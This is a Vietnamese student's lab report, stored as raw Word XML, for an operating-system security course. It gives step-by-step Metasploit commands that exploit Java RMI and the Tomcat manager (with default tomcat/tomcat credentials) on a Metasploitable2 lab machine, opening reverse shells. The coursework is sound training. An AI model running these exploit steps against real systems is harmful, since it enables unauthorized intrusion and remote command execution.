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392FA" w14:textId="45496C9D" w:rsidR="004A4DBF" w:rsidRPr="0048447B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>Báo cáo th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ự</w:t>
      </w:r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c hành môn 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A</w:t>
      </w:r>
      <w:r w:rsidR="00A7245D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>n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toàn hệ điều hành</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="571A6E24" w14:textId="3BC63654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Bài thực hành </w:t>
      </w:r>
      <w:r w:rsidR="00603C1A">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C003585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F11EC03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D97E784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7995DD1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1B0CA81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6559DD1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D942495" w14:textId="77777777" w:rsidR="004A4DBF" w:rsidRDefault="004A4DBF" w:rsidP="004A4DBF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74C30CE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Họ và tên: Hoàng Trung Kiên</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40F95662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Mã sinh viên: B20DCAT098</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3873B7B5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A5B66E1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F86B48F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DC99E3A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AC7ED77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2EDB245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3DCB1D8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49F8ED3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8372007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5D46B42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1239E17" w14:textId="77777777" w:rsidR="004A4DBF" w:rsidRDefault="004A4DBF" w:rsidP="004A4DBF">
      <w:pPr>
        <w:ind w:left="1134" w:firstLine="85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E74AD66" w14:textId="77777777" w:rsidR="004A4DBF" w:rsidRDefault="004A4DBF" w:rsidP="004A4DBF">
      <w:pPr>
        <w:ind w:left="1134" w:firstLine="85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199ADF6" w14:textId="04E2E3B0" w:rsidR="004A4DBF" w:rsidRPr="004A4DBF" w:rsidRDefault="004A4DBF" w:rsidP="004A4DBF">
      <w:pPr>
        <w:ind w:left="-284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B6274D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Hà nội, ngày 1</w:t>
      </w:r>
      <w:r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B6274D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> tháng 3 năm 2023</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74716FDA" w14:textId="77777777" w:rsidR="004E4A9C" w:rsidRDefault="004E4A9C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CC8E649" w14:textId="10B114A3" w:rsidR="006B35E7" w:rsidRPr="0006561E" w:rsidRDefault="0006561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1. </w:t>
      </w:r>
      <w:r w:rsidR="006B35E7" w:rsidRPr="0006561E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Cài đặt các công cụ nền tảng </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F2CE55D" w14:textId="77777777" w:rsidR="0006561E" w:rsidRPr="005D53A4" w:rsidRDefault="0006561E" w:rsidP="009F379C">
      <w:pPr>
        <w:spacing w:after="0" w:line="247" w:lineRule="auto"/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 xml:space="preserve">-Đổi tên hostname: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1867D9BC" w14:textId="77777777" w:rsidR="0006561E" w:rsidRPr="005D53A4" w:rsidRDefault="0006561E" w:rsidP="009F379C">
      <w:pPr>
        <w:spacing w:after="0" w:line="247" w:lineRule="auto"/>
        <w:ind w:left="-284" w:firstLine="284"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D53A4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>+Máy attacker:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22B1C792" w14:textId="7E2C4703" w:rsidR="00A7245D" w:rsidRPr="0006561E" w:rsidRDefault="00BE1A0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FDD086" wp14:editId="7FD94581">
            <wp:extent cx="5731510" cy="1070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260" w14:textId="19BD91F5" w:rsidR="00BE1A02" w:rsidRPr="0006561E" w:rsidRDefault="0006561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+</w:t>
      </w:r>
      <w:r w:rsidR="00BE1A02" w:rsidRPr="0006561E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Máy </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Victim</w:t>
      </w:r>
      <w:r w:rsidR="00BE1A02" w:rsidRPr="0006561E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> Metasploit:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DE00EEC" w14:textId="03AD3082" w:rsidR="00A7245D" w:rsidRPr="0006561E" w:rsidRDefault="00577D7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507EBD1" wp14:editId="710A5724">
            <wp:extent cx="5731510" cy="1238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04B" w14:textId="5C74DB09" w:rsidR="009F379C" w:rsidRPr="005D53A4" w:rsidRDefault="009F379C" w:rsidP="009F379C">
      <w:pPr>
        <w:spacing w:after="0" w:line="247" w:lineRule="auto"/>
        <w:ind w:left="-426" w:firstLine="426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2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. Đ</w:t>
      </w:r>
      <w:r w:rsidRPr="005D53A4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>ịa chỉ IP máy Metasploitable2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77F106B" w14:textId="51DDA86E" w:rsidR="009F379C" w:rsidRPr="005D53A4" w:rsidRDefault="009F379C" w:rsidP="009F379C">
      <w:pPr>
        <w:spacing w:after="0" w:line="247" w:lineRule="auto"/>
        <w:ind w:left="-426" w:firstLine="426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Địa</w:t>
      </w:r>
      <w:r w:rsidRPr="005D53A4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> chỉ ip máy Victim: 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192.168.100.13</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6096E5AC" w14:textId="262AACCA" w:rsidR="00A7245D" w:rsidRPr="0006561E" w:rsidRDefault="00577D7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4F27D87" wp14:editId="5AAA1CB8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7EF3" w14:textId="52C2D352" w:rsidR="009F379C" w:rsidRPr="005D53A4" w:rsidRDefault="009F379C" w:rsidP="009F379C">
      <w:pPr>
        <w:spacing w:after="0" w:line="247" w:lineRule="auto"/>
        <w:ind w:left="-426" w:firstLine="426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3</w:t>
      </w:r>
      <w:r w:rsidRPr="005D53A4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>. Địa chỉ IP máy Kali.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D652949" w14:textId="77777777" w:rsidR="009F379C" w:rsidRPr="005D53A4" w:rsidRDefault="009F379C" w:rsidP="009F379C">
      <w:pPr>
        <w:spacing w:after="0" w:line="247" w:lineRule="auto"/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 w:rsidRPr="005D53A4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Địa chỉ ip máy attacker: 192.168.100.3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1163DFA3" w14:textId="4E3398C0" w:rsidR="00C26BBB" w:rsidRDefault="00577D7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932DF7" wp14:editId="41B956AA">
            <wp:extent cx="5731510" cy="2456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CFA6" w14:textId="77777777" w:rsidR="00EE7866" w:rsidRDefault="00EE786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7642DD2F" w14:textId="77777777" w:rsidR="00EE7866" w:rsidRPr="0006561E" w:rsidRDefault="00EE786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284373B6" w14:textId="6E4AA249" w:rsidR="009738FF" w:rsidRPr="00CD4DAF" w:rsidRDefault="00E41632" w:rsidP="009738FF">
      <w:pPr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4</w:t>
      </w:r>
      <w:r w:rsidR="009738FF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CD4DAF">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Đảm bảo kết nối giữa 2 máy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26D4D7F4" w14:textId="19DC01F2" w:rsidR="00E964C4" w:rsidRPr="0006561E" w:rsidRDefault="00E964C4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>Kiểm tra kết nối giữa hai máy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="166576FC" w14:textId="77777777" w:rsidR="00C2230D" w:rsidRPr="0006561E" w:rsidRDefault="00C2230D" w:rsidP="009F379C">
      <w:pPr>
        <w:spacing w:after="0" w:line="247" w:lineRule="auto"/>
        <w:ind w:left="-426" w:firstLine="426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sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">-Máy attacker ping đến máy victim: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D926F66" w14:textId="77777777" w:rsidR="00C2230D" w:rsidRPr="0006561E" w:rsidRDefault="00C2230D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>+Kiểm tra kết nối từ máy attacker đến máy victim: ping (attacker -&gt; victim)—--&gt; 0% packet loss —---&gt; có thể kết nối từ máy attacker tới máy victim</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F326543" w14:textId="64769BCF" w:rsidR="00E964C4" w:rsidRDefault="00E964C4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028585" wp14:editId="2A1D1018">
            <wp:extent cx="5731510" cy="1807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3B60" w14:textId="77777777" w:rsidR="00215DA6" w:rsidRPr="0006561E" w:rsidRDefault="00215DA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0AE383F" w14:textId="77777777" w:rsidR="00BB77A0" w:rsidRPr="0006561E" w:rsidRDefault="00BB77A0" w:rsidP="009F379C">
      <w:pPr>
        <w:spacing w:after="0" w:line="247" w:lineRule="auto"/>
        <w:ind w:left="-426" w:firstLine="426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sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>-Máy victim ping đến máy attacker</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56B07DC9" w14:textId="4BD66B00" w:rsidR="00BB77A0" w:rsidRPr="0006561E" w:rsidRDefault="00BB77A0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 xml:space="preserve">+Kiểm tra kết nối từ máy victim đến máy attacker: ping (victim -&gt; attacker)—--&gt; 0% packet loss —---&gt; có thể kết nối từ máy victim tới máy attacker </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BD3B6D0" w14:textId="7467D5EF" w:rsidR="00BB77A0" w:rsidRPr="0006561E" w:rsidRDefault="00BB77A0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E9D59BE" wp14:editId="4711481D">
            <wp:extent cx="5731510" cy="1912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FD4" w14:textId="77777777" w:rsidR="00F81F7E" w:rsidRPr="0006561E" w:rsidRDefault="00F81F7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293F1726" w14:textId="6B8DFB77" w:rsidR="00F81F7E" w:rsidRPr="0006561E" w:rsidRDefault="00E4163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5</w:t>
      </w:r>
      <w:r w:rsidR="00BB77A0" w:rsidRPr="0006561E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="002F3C8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BB77A0" w:rsidRPr="0006561E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Khai thác lỗ hổng sử dụng cấu hình ngầm định trong trong dịch vụ Java RMI: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BE1A4FF" w14:textId="2A2B979E" w:rsidR="00F81F7E" w:rsidRPr="0006561E" w:rsidRDefault="00BB77A0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 xml:space="preserve">-Khởi động Metasploit </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="656440BE" w14:textId="1CD8D09A" w:rsidR="00F81F7E" w:rsidRDefault="00F81F7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B6B336" wp14:editId="1877F13E">
            <wp:extent cx="5731510" cy="2251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8DF8" w14:textId="77777777" w:rsidR="00A7245D" w:rsidRPr="0006561E" w:rsidRDefault="00A7245D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663B7A26" w14:textId="3EDCF8B4" w:rsidR="00F81F7E" w:rsidRPr="0006561E" w:rsidRDefault="002F3C8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BB77A0" w:rsidRPr="0006561E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Khai báo sử dụng mô đun tấn công: use exploit/multi/misc/java_rmi_server </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F8B77BC" w14:textId="54B10CD3" w:rsidR="00F81F7E" w:rsidRDefault="00F81F7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48F46D4" wp14:editId="4472C878">
            <wp:extent cx="5731510" cy="1645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159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65C74EEC" w14:textId="24E56806" w:rsidR="00F81F7E" w:rsidRPr="0006561E" w:rsidRDefault="002F3C8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BB77A0" w:rsidRPr="0006561E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Chọn payload cho thực thi (mở shell): set payload java/shell/reverse_tcp </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46E14B21" w14:textId="0FD48254" w:rsidR="00BB77A0" w:rsidRPr="0006561E" w:rsidRDefault="00BB77A0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>-Đặt địa chỉ IP máy victim: set RHOST</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A284CBB" w14:textId="63CBEF0B" w:rsidR="00A10858" w:rsidRDefault="00A10858" w:rsidP="009F379C">
      <w:pPr>
        <w:spacing w:after="0" w:line="252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22986F0" wp14:editId="13C3502D">
            <wp:extent cx="5731510" cy="1222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5B8" w14:textId="77777777" w:rsidR="000E12F8" w:rsidRPr="0006561E" w:rsidRDefault="000E12F8" w:rsidP="009F379C">
      <w:pPr>
        <w:spacing w:after="0" w:line="252" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="289C87CF" w14:textId="1FA89F5B" w:rsidR="00BB77A0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sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>-Chạy lệnh: show options</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2905EFC4" w14:textId="7002CFA4" w:rsidR="000E12F8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F0BEBA" wp14:editId="65E10AEF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19FD" w14:textId="77777777" w:rsidR="000E12F1" w:rsidRDefault="000E12F1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2367F5" w:rsidRPr="0006561E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Thực thi tấn công: exploit </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EA2F060" w14:textId="5EA14EEF" w:rsidR="002367F5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="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>➔</w:t>
      </w:r>
      <w:r w:rsidRPr="0006561E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> Nếu thực hiện thành công, hệ thống sẽ báo “Command shell session 1 opened”, sau lại báo lỗi và trở về dấu nhắc của bước trước</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DEC2BDB" w14:textId="6200B16A" w:rsidR="002367F5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95DF46" wp14:editId="53AE44E2">
            <wp:extent cx="5731510" cy="11176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A9E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50D77CC0" w14:textId="1F915284" w:rsidR="002367F5" w:rsidRPr="0006561E" w:rsidRDefault="006756F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2367F5" w:rsidRPr="0006561E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Chạy các lệnh trong phiên khai thác đang mở: whoami</w:t>
      </w:r>
      <w:r w:rsidR="002367F5" w:rsidRPr="0006561E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, id,</w:t>
      </w:r>
      <w:r w:rsidR="002367F5" w:rsidRPr="0006561E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> uname -a hostname - Gõ lệnh exit để kết thúc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ED9616C" w14:textId="5411E345" w:rsidR="002367F5" w:rsidRPr="0006561E" w:rsidRDefault="00D66EC9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D48C248" wp14:editId="425EBCDD">
            <wp:extent cx="5731510" cy="1775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FF5C" w14:textId="77777777" w:rsidR="002367F5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12E0C3D3" w14:textId="77777777" w:rsidR="002367F5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 xml:space="preserve">6.Khai thác lỗi trên Apache Tomcat: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7517AA3B" w14:textId="67077A82" w:rsidR="002367F5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>-Khởi động Metasploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24F3BF6B" w14:textId="36E4B0C1" w:rsidR="002367F5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96FF2CE" wp14:editId="1E867F40">
            <wp:extent cx="5731510" cy="3659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E6C" w14:textId="68938BEB" w:rsidR="00EE7866" w:rsidRDefault="00EE786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5A59A210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32EFC64C" w14:textId="28ADFBF5" w:rsidR="002367F5" w:rsidRPr="0006561E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sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">-Khai báo sử dụng mô đun tấn công: use exploit/multi/http/tomcat_mgr_upload </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56B40934" w14:textId="3BAB1EF9" w:rsidR="00486212" w:rsidRDefault="002367F5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CCA42A5" wp14:editId="01D5A0DC">
            <wp:extent cx="5731510" cy="13646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0429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4A05E577" w14:textId="7B69E1D3" w:rsidR="002367F5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2367F5" w:rsidRPr="0006561E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Đặt địa chỉ IP máy victim: set RHOST </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57F4D7CB" w14:textId="70094C94" w:rsidR="002367F5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2367F5" w:rsidRPr="0006561E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Đặt 445 là cổng truy cập máy victim: set RPORT 8180 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A6B266F" w14:textId="2246C965" w:rsidR="00486212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2367F5" w:rsidRPr="0006561E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Chọn payload cho thực thi (mở shell): set payload java/shell/reverse_tcp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="517A8B3F" w14:textId="10A8E91B" w:rsidR="000C4B2D" w:rsidRDefault="0048621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9791ACE" wp14:editId="3A5642A3">
            <wp:extent cx="5731510" cy="534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6128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55F2E244" w14:textId="3BD3E8F3" w:rsidR="000C4B2D" w:rsidRPr="0006561E" w:rsidRDefault="00E4163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Đặt Http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Password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: set H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ttpPassword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 xml:space="preserve"> tomcat</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D8EB53E" w14:textId="4B9C738A" w:rsidR="000C4B2D" w:rsidRPr="0006561E" w:rsidRDefault="00E4163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 xml:space="preserve">Đặt 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HttpUsername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 xml:space="preserve">: set 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>HttpUsername</w:t>
      </w:r>
      <w:r w:rsidR="000C4B2D" w:rsidRPr="0006561E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> tomcat</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C52C0BE" w14:textId="4C0956FD" w:rsidR="000C4B2D" w:rsidRPr="0006561E" w:rsidRDefault="00E41632" w:rsidP="009F379C">
      <w:pPr>
        <w:spacing w:after="0" w:line="247" w:lineRule="auto"/>
        <w:ind w:left="-284" w:firstLine="284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0C4B2D" w:rsidRPr="0006561E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Chạy lệnh “show options” để xem các thông tin về mô đun tấn công đang sử dụng</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A3D4B4C" w14:textId="7E1A046F" w:rsidR="00671986" w:rsidRDefault="0006561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6CADF16" wp14:editId="2352A880">
            <wp:extent cx="5731510" cy="3881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0C69" w14:textId="77777777" w:rsidR="000E12F8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142CD7E5" w14:textId="7D47855B" w:rsidR="00B56445" w:rsidRPr="0006561E" w:rsidRDefault="00E41632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671986" w:rsidRPr="0006561E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Thực thi tấn công: exploit </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D9910C8" w14:textId="0CCDFC2D" w:rsidR="0006561E" w:rsidRDefault="0006561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B193753" wp14:editId="15F4889A">
            <wp:extent cx="5731510" cy="945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774" w14:textId="77777777" w:rsidR="00EE7866" w:rsidRPr="0006561E" w:rsidRDefault="00EE786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</w:p>
    <w:p w14:paraId="54B68745" w14:textId="77777777" w:rsidR="00B56445" w:rsidRPr="0006561E" w:rsidRDefault="0067198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="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>➔</w:t>
      </w:r>
      <w:r w:rsidRPr="0006561E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> mở shell với người dùng tomcat55 cho phép chạy lệnh từ máy Kali </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="409E9919" w14:textId="17633A0B" w:rsidR="00B56445" w:rsidRPr="0006561E" w:rsidRDefault="00671986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</w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0006561E">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>➔</w:t>
      </w:r>
      <w:r w:rsidRPr="0006561E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> có thể thực hiện bất cứ lệnh shell nào trên máy victim. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67010CEB" w14:textId="23A58CD4" w:rsidR="00671986" w:rsidRPr="0006561E" w:rsidRDefault="000E12F8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671986" w:rsidRPr="0006561E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Chạy các lệnh để đọc tên người dùng và máy đang truy cập: whoami</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, id,</w:t>
      </w:r>
      <w:r w:rsidR="005A4F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671986" w:rsidRPr="0006561E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>uname -a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r w:rsidR="00671986" w:rsidRPr="0006561E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>hostnam</w:t>
      </w:r>
      <w:r w:rsidR="00671986" w:rsidRPr="0006561E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>e</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0454F0AD" w14:textId="054FCAA9" w:rsidR="0006561E" w:rsidRPr="0006561E" w:rsidRDefault="0006561E" w:rsidP="009F379C">
      <w:pPr>
        <w:spacing w:after="0" w:line="247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6561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11E65CC" wp14:editId="09F727B5">
            <wp:extent cx="5731510" cy="7689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61E" w:rsidRPr="0006561E" w:rsidSect="00A7245D">
      <w:pgSz w:w="11906" w:h="16838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05"/>
    <w:rsid w:val="0006561E"/>
    <w:rsid w:val="000C4B2D"/>
    <w:rsid w:val="000D2D05"/>
    <w:rsid w:val="000E12F1"/>
    <w:rsid w:val="000E12F8"/>
    <w:rsid w:val="00215DA6"/>
    <w:rsid w:val="002367F5"/>
    <w:rsid w:val="002F1C9F"/>
    <w:rsid w:val="002F3C82"/>
    <w:rsid w:val="00486212"/>
    <w:rsid w:val="004A4DBF"/>
    <w:rsid w:val="004E4A9C"/>
    <w:rsid w:val="005525E8"/>
    <w:rsid w:val="00577D75"/>
    <w:rsid w:val="005A4F77"/>
    <w:rsid w:val="00603C1A"/>
